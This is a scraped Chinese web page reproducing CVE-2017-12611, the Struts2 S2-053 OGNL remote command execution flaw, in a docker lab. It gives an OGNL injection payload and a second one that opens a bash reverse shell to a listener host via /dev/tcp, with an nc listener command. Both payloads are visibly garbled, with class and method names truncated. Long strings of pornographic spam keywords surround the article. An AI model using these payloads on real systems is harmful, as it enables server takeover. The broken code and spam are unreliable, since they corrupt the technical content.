• <em id="6vhwh"><rt id="6vhwh"></rt></em>

    <style id="6vhwh"></style>

    <style id="6vhwh"></style>
    1. <style id="6vhwh"></style>
        <sub id="6vhwh"><p id="6vhwh"></p></sub>
        <p id="6vhwh"></p>
          1. 国产亚洲欧洲av综合一区二区三区 ,色爱综合另类图片av,亚洲av免费成人在线,久久热在线视频精品视频,成在人线av无码免费,国产精品一区二区久久毛片,亚洲精品成人片在线观看精品字幕 ,久久亚洲精品成人av秋霞

            CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現

            更新時間:2023-12-09 21:24:29 閱讀: 評論:0

            2023年12月9日發(作者:年終獎怎么發)

            -

            CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現

            CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現

            一:漏洞描述

            Struts2在使用Freemarker模塊引擎的時候,同時允許解析OGNL表達式。導致用戶輸入的數據本身不會被OGNL解析,但是由于被

            Freemarker解析一次后變成離開一個表達式,被OGNL解析第二次,導致任意命令執行漏洞。

            二:受影響的版本

            Struts 2.0.1-struts 2.3.33

            Struts 2.5-Struts 2.5.10

            三:環境搭建(192.168.33.144)

            1、使用docker搭建環境

            cd vulhub/struts2/s2-053

            2、一鍵搭建環境

            docker-compo up -d

            3、訪問:192.168.33.144:8080/。

            四:攻擊

            1、在Your url中寫入POC

            POC:

            %{(#dm=@ntext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['mphony.x

            ner']).(#ognlUtil=#tance(@il@class)).(#ludedPackageNa

            mes().clear()).(#ludedClass().clear()).(#berAccess(#dm)))).(#cmd='id').(#iswin=(@@getProperty('

            e').toLowerCa().contains('win'))).(#cmds=(#iswin?{'','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new sBuilder(#cmds)).(#ctErr

            orStream(true)).(#process=#()).(@s@toString(#utStream()))}2、點擊submit。4、反彈shell,把shell反彈到kali上(kali:192.168.33.146)nc -lvvp 1234填寫POC%{(#dm=@ntext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['ner']).(#ognlUtil=#tance(@il@class)).(#ludedPackageNames().clear()).(#ludedClass().clear()).(#berAccess(#dm)))).(#cmd='bash -i >& /dev/tcp/192.168.33.146/1234 0>&1').(#iswin=(@@getProperty('').toLowerCa().contains('win'))).(#cmds=(#iswin?{'','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new sBuilder(#cmds)).(#ctErrorStream(true)).(#process=#()).(@s@toString(#utStream()))}kali上成功反彈shell

            -

            CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現

            本文發布于:2023-12-09 21:24:29,感謝您對本站的認可!

            本文鏈接:http://m.newhan.cn/zhishi/a/1702128269116497.html

            版權聲明:本站內容均來自互聯網,僅供演示用,請勿用于商業和其他非法用途。如果侵犯了您的權益請與我們聯系,我們將在24小時內刪除。

            本文word下載地址:CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現.doc

            本文 PDF 下載地址:CVE-2017-12611(【S2-053】Struts2遠程命令執行漏洞)漏洞復現.pdf

            標簽:漏洞   解析   執行
            留言與評論(共有 0 條評論)
               
            驗證碼:
            推薦文章
            排行榜
            Copyright ?2019-2022 Comsenz Inc.Powered by ? 實用文體寫作網旗下知識大全大全欄目是一個全百科類寶庫! 優秀范文|法律文書|專利查詢|
            主站蜘蛛池模板: 69精品丰满人妻无码视频a片| 华人在线亚洲欧美精品| 国产精品久久毛片| 欧美日韩国产一区二区三区欧| 精品少妇av蜜臀av| 亚洲精品久久久中文字幕痴女| 欧洲亚洲国内老熟女超碰| 久久精品伊人狠狠大香网| 久久精品国产6699国产精| 灭火宝贝高清完整版在线观看| 少妇人妻88久久中文字幕| 青青草原国产精品啪啪视频| 又黄又无遮挡AAAAA毛片| 人妻在厨房被色诱中文字幕| 久久久精品免费国产四虎| 久久国产V一级毛多内射| 青青草原国产精品啪啪视频| 91九色系列视频在线国产| 亚洲午夜无码av毛片久久| 亚洲a免费| 国产精品入口麻豆| 丰满人妻一区二区三区无码AV| 国产成人精品自在钱拍| 免费无码高H视频在线观看| 亚洲精品毛片一区二区| 看全黄大色黄大片视频| 无码人妻系列不卡免费视频| 国产精品夫妇激情啪发布| 国产免费丝袜调教视频免费的| 欧美性猛交xxxx免费视频软件| 国产精品69人妻我爱绿帽子| 国产乱码精品一区二区三| 色综合色狠狠天天综合网| 自拍第一区视频在线观看| 久久国产精品亚洲精品99| 中文字幕亚洲综合小综合| 国内精品一区二区不卡| 大地资源免费视频观看| 久久天天躁狠狠躁夜夜躁2012| 91系列在线观看| 亚洲各类熟女们中文字幕|